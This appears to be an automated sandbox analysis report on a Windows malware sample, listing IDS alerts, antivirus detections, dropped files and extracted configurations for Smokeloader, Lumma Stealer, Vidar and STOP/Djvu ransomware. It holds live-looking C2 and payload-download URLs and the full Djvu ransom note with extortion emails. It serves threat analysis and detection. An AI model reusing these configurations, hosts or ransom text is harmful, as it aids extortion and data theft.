Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Vodkagats Loader Requesting Payload - Source IP: 192.168.2.10 - Destination IP: 190.249.187.165

Timestamp:	04/04/24-17:49:03.873204
SID:	2036333
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:49:12.942777
SID:	2039103
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:48:53.159481
SID:	2039103
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:49:10.397981
SID:	2039103
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) - Source IP: 192.168.2.10 - Destination IP: 172.67.217.100

Timestamp:	04/04/24-17:49:17.585570
SID:	2050742
Source Port:	49758
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Vodkagats Loader Requesting Payload - Source IP: 192.168.2.10 - Destination IP: 189.195.132.134

Timestamp:	04/04/24-17:49:06.605631
SID:	2036333
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:49:01.780769
SID:	2039103
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:49:21.462222
SID:	2039103
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:49:19.692835
SID:	2039103
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:48:50.137339
SID:	2039103
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:49:17.487044
SID:	2039103
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:49:01.164132
SID:	2039103
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:48:58.190802
SID:	2039103
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Filecoder.STOP Variant Public Key Download - Source IP: 189.195.132.134 - Destination IP: 192.168.2.10

Timestamp:	04/04/24-17:49:07.043115
SID:	2036335
Source Port:	80
Destination Port:	49733
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:48:52.008408
SID:	2039103
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Filecoder.STOP Variant Public Key Download - Source IP: 189.195.132.134 - Destination IP: 192.168.2.10

Timestamp:	04/04/24-17:49:06.979370
SID:	2036335
Source Port:	80
Destination Port:	49732
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) - Source IP: 192.168.2.10 - Destination IP: 172.67.217.100

Timestamp:	04/04/24-17:49:16.172927
SID:	2050742
Source Port:	49754
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:48:59.405957
SID:	2039103
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:49:18.076502
SID:	2039103
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:49:09.814891
SID:	2039103
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Potential Dridex.Maldoc Minimal Executable Request - Source IP: 192.168.2.10 - Destination IP: 190.249.187.165

Timestamp:	04/04/24-17:49:03.873204
SID:	2020826
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:48:51.417167
SID:	2039103
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:49:11.114042
SID:	2039103
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:49:14.163008
SID:	2039103
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:49:20.283171
SID:	2039103
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) - Source IP: 192.168.2.10 - Destination IP: 172.67.217.100

Timestamp:	04/04/24-17:49:19.025167
SID:	2050742
Source Port:	49762
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Potential Dridex.Maldoc Minimal Executable Request - Source IP: 192.168.2.10 - Destination IP: 189.195.132.134

Timestamp:	04/04/24-17:49:06.605631
SID:	2020826
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:49:20.881308
SID:	2039103
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:49:09.231909
SID:	2039103
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:49:00.584097
SID:	2039103
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:49:22.644556
SID:	2039103
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:49:11.855189
SID:	2039103
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:48:57.606948
SID:	2039103
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://sajdfue.com/test1/get.php	Avira URL Cloud: Label: malware
Source: http://sajdfue.com/files/1/build3.exerun381	Avira URL Cloud: Label: malware
Source: http://trade-inmyus.com/index.php	Avira URL Cloud: Label: malware
Source: http://sajdfue.com/test1/get.php?pid=F45A1084736B94F4480CF5D84F7F4DDD&first=trueL3V9	Avira URL Cloud: Label: malware
Source: http://sdfjhuz.com/dl/build2.exe$run	Avira URL Cloud: Label: malware
Source: https://resergvearyinitiani.shop/lc	Avira URL Cloud: Label: malware
Source: http://sajdfue.com/files/1/build3.exe$run	Avira URL Cloud: Label: malware
Source: http://sajdfue.com/files/1/build3.exe	Avira URL Cloud: Label: malware
Source: http://sajdfue.com/test1/get.phpy	Avira URL Cloud: Label: malware
Source: http://sajdfue.com/test1/get.php?pid=F45A1084736B94F4480CF5D84F7F4DDD	Avira URL Cloud: Label: malware
Source: http://sajdfue.com/test1/get.php?pid=F45A1084736B94F4480CF5D84F7F4DDDE	Avira URL Cloud: Label: malware
Source: https://resergvearyinitiani.shop/-	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1601.exe	Avira: detection malicious, Label: HEUR/AGEN.1316639
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Avira: detection malicious, Label: HEUR/AGEN.1313018
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Avira: detection malicious, Label: HEUR/AGEN.1316639
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\build2[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1313018
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe	Avira: detection malicious, Label: TR/AD.MalwareCrypter.llbpm
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\build3[1].exe	Avira: detection malicious, Label: TR/AD.MalwareCrypter.llbpm
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Avira: detection malicious, Label: TR/AD.MalwareCrypter.llbpm

Found malware configuration

Source: 00000013.00000002.2287228950.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199662282318"], "Botnet": "1f691793c84445b319605236a41a1e5a", "Version": "8.8"}
Source: 0000000F.00000002.1764359339.0000000004960000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Djvu {"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://sajdfue.com/files/1/build3.exe"], "C2 url": "http://sajdfue.com/test1/get.php", "Ransom note file": "_README.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/df01994dd8d37c2c33469922f8e7155a20240402134014/fd95b0\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0859PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E
Source: 00000000.00000002.1443196159.0000000002D00000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://trad-einmyus.com/index.php", "http://tradein-myus.com/index.php", "http://trade-inmyus.com/index.php"]}
Source: 455F.exe.3688.20.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["associationokeo.shop", "turkeyunlikelyofw.shop", "pooreveningfuseor.pw", "edurestunningcrackyow.fun", "detectordiscusser.shop", "problemregardybuiwo.fun", "lighterepisodeheighte.fun", "lighterepisodeheighte.fun", "technologyenterdo.shop", "resergvearyinitiani.shop"], "Build id": "GhJLkO--seevpalpadin"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\build2[1].exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\build3[1].exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\455F.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Roaming\fcbhtea	ReversingLabs: Detection: 38%

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe

ReversingLabs: Detection: 39%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1601.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\build2[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\build3[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	9_2_0040E870
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_0040EA51 CryptDestroyHash,CryptReleaseContext,	9_2_0040EA51
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	9_2_0040EAA0
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_0040EC68 CryptDestroyHash,CryptReleaseContext,	9_2_0040EC68
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,	9_2_00410FC0
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00411178 CryptDestroyHash,CryptReleaseContext,	9_2_00411178

Source: 1601.exe, 00000010.00000002.2621304334.0000000000901000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_5b87387e-1

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\1601.exe	Unpacked PE file: 9.2.1601.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Unpacked PE file: 16.2.1601.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Unpacked PE file: 17.2.1601.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Unpacked PE file: 19.2.build2.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Unpacked PE file: 29.2.1601.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe	Unpacked PE file: 30.2.build3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Unpacked PE file: 38.2.1601.exe.400000.0.unpack

Source: SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\1601.exe	File created: C:\_README.txt	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	File created: C:\$WinREAgent\_README.txt	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	File created: C:\$WinREAgent\Scratch\_README.txt	Jump to behavior
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	File created: C:\Users\user\_README.txt

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.10:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.10:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.10:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.47.27.74:443 -> 192.168.2.10:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.216.179.73:443 -> 192.168.2.10:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.217.100:443 -> 192.168.2.10:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.217.100:443 -> 192.168.2.10:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.16.114:443 -> 192.168.2.10:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.10:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.217.100:443 -> 192.168.2.10:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.217.100:443 -> 192.168.2.10:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.217.238:443 -> 192.168.2.10:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.217.100:443 -> 192.168.2.10:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.217.100:443 -> 192.168.2.10:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.217.100:443 -> 192.168.2.10:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.10:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.10:49777 version: TLS 1.2

Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 1601.exe, 1601.exe, 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 0000000F.00000002.1764359339.0000000004960000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 00000010.00000002.2618108080.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 1601.exe, 00000011.00000002.2618390493.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 1601.exe, 0000001C.00000002.1898227455.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 0000001D.00000002.1908200687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 1601.exe, 00000022.00000002.2000374378.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 00000026.00000002.2012212178.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdbP source: build2.exe, 00000013.00000002.2301766220.000000006CE2D000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: C:\hejuyabiyuda\lunofin.pdb source: build2.exe, 00000012.00000002.1802688961.0000000000412000.00000002.00000001.01000000.00000009.sdmp, build2.exe, 00000012.00000000.1799933563.0000000000412000.00000002.00000001.01000000.00000009.sdmp, build2.exe, 00000013.00000000.1800991482.0000000000412000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: nss3.pdb@ source: build2.exe, 00000013.00000002.2302580877.000000006CFEF000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: a+C:\hejuyabiyuda\lunofin.pdb source: build2.exe, 00000012.00000002.1802688961.0000000000412000.00000002.00000001.01000000.00000009.sdmp, build2.exe, 00000012.00000000.1799933563.0000000000412000.00000002.00000001.01000000.00000009.sdmp, build2.exe, 00000013.00000000.1800991482.0000000000412000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 00000019.00000002.1942406956.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, build3.exe, 00000019.00000000.1850735535.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, build3.exe, 0000001E.00000000.1941210012.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000021.00000002.2168461790.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, mstsca.exe, 00000021.00000000.1962875348.0000000000401000.00000020.00000001.01000000.0000000D.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 1601.exe, 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 1601.exe, 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 0000000F.00000002.1764359339.0000000004960000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 00000010.00000002.2618108080.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 1601.exe, 00000011.00000002.2618390493.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 1601.exe, 0000001C.00000002.1898227455.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 0000001D.00000002.1908200687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 1601.exe, 00000022.00000002.2000374378.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 00000026.00000002.2012212178.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: build2.exe, 00000013.00000002.2302580877.000000006CFEF000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: build2.exe, 00000013.00000002.2295057732.0000000020F32000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2293491175.000000001E9F8000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: build2.exe, 00000013.00000002.2301766220.000000006CE2D000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: HC:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 00000019.00000002.1942406956.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, build3.exe, 00000019.00000000.1850735535.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, build3.exe, 0000001E.00000000.1941210012.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000021.00000002.2168461790.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, mstsca.exe, 00000021.00000000.1962875348.0000000000401000.00000020.00000001.01000000.0000000D.sdmp

Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	9_2_00410160
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	9_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	9_2_0040FB98

Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
